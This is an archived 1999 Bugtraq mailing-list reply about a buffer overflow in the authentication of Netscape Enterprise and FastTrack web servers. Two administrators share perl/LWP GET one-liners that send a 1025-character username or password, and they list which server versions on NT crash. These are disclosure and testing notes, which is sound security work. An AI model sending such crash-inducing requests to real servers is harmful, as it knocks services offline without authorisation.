[12845] in bugtraq

home help back first fref pref prev next nref lref last post

Re: ISS Security Advisory: Buffer Overflow in Netscape Enterprise

daemon@ATHENA.MIT.EDU (Brock Sides)
Fri Dec 3 18:43:24 1999

Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-Id:  <Pine.LNX.4.21.9912031516550.12451-100000@koala.towery.com>
Date:         Fri, 3 Dec 1999 15:38:04 -0600
Reply-To: Brock Sides <bsides@TOWERY.COM>
From: Brock Sides <bsides@TOWERY.COM>
X-To:         Doug Monroe <monwel@INTERHACK.NET>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To:  <3.0.3.32.19991202131732.006a39cc@postoffice.worldnet.att.net>

Some more data. Using LWP's "GET" as follows:

$ GET -C `perl -e 'print "A"x1025'`:password http://hostname:port

Netscape FastTrack 3.0.1 on NT: crashes
Admin Server 3.5 on NT: crashes
Netscape FastTrack 3.0.2 on Irix 6.x: no problem
Admin Sever 3.5 on Irix 6.x: no problem
Netscape Enterprise 3.6sp2 on Irix 6.x: no problem

--
Brock Sides
Unix Systems Administration
Towery Publishing
bsides@towery.com

On Thu, 2 Dec 1999, Doug Monroe wrote:

> RE:
> > ISS Security Advisory
> > December 1, 1999
> > Buffer Overflow in Netscape Enterprise and FastTrack Authentication
>                > Procedure
>
> I made a few simple pokes with variants of perl LWP's 'GET' function at
> areas of 2 NES 3.x servers that are protected with Basic Authentication.
> For example-
> $ GET -C username:`perl -e 'print "A"x1025'` http://server/private-path
> $ GET -C `perl -e 'print "A"x1025'`:password http://server/private-path
>
> Solaris 2.6/NES 3.5.1 (and 3.6.3)-
>  username:LONGpw -> http://server/private-path - NO KILL
>  LONGusername:pw -> http://server/private-path - NO KILL
>
> NT4/SP4/NES 3.6.2-
>  username:LONGpw -> http://server/private-path - NO KILL
>  LONGusername:pw -> http://server/private-path - KILL
>
> Potentially important diffs/notes:
> On the Solaris box, the private area was config'd with .nsconfig/NCSA-style
> ACL.
> On the NT, the private area was protected using local-db ACL, not NCSA-style.
> I have not tried poking a local-db/LDIF protected area on Solaris.
> I have not tried poking a .nsconfig/NCSA-style area on NT.
> I have not tried poking at the admin server of either box.
> --
> Doug Monroe
> www.interhack.net
>
home help back first fref pref prev next nref lref last post